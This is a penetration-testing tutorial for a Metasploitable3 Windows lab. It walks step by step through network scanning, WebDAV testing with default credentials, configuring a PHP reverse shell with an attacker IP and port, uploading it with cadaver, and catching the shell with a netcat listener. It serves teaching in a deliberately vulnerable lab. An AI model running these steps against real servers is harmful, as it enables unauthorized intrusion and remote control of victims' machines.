Reverse Shell on MetaSploitable3 Windows

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Router IP from eth0 on your Kali Machine

ip addr 

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0 

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24 

Example Results:

192.168.1.3 02:f9:8e:69:9e:55 (Unknown: locally administered) 192.168.1.1 e0:19:54:46:e5:6e zte corporation 192.168.1.11 08:00:27:e7:c3:e8 PCS Systemtechnik GmbH 

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt 

Example Results:

Discovered open port 2869/tcp on 192.168.1.3 Discovered open port 7676/tcp on 192.168.1.11 Discovered open port 23/tcp on 192.168.1.1 // Also the open port 8585 for the WebDav PORT STATE SERVICE REASON VERSION 8585/tcp open unknown syn-ack ttl 64 

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 TCP/IP fingerprint: 

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads 

Example Results:

Testing DAV connection OPEN SUCCEED: http://192.168.1.11:8585/uploads 

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop 

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10'; // Kali machine IP $port = 7779; // TCP/UDP Port $shell = 'cmd.exe'; // Use cmd.exe for Windows 

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779 

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php 

Step 8: Check Netcat Listener for Shell

nc -lnvp 7779 

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.

Explanation:

1. Information Gathering:

   • Step 0: Check the router IP to identify the local network's subnet.
   • Step 1: Use arp-scan to discover active hosts on the network.
   • Step 2: Perform an Nmap scan to find open ports and detect the operating system.

2. WebDAV Exploitation:

   • Step 3: Use davtest to verify that the WebDAV service is accessible.
   • Step 4: Copy a PHP reverse shell script to the attacker's machine.
   • Step 5: Edit the PHP script with the attacker's IP and desired port.
   • Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
   • Step 7: Upload the modified PHP script to the target using Cadaver.
   • Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.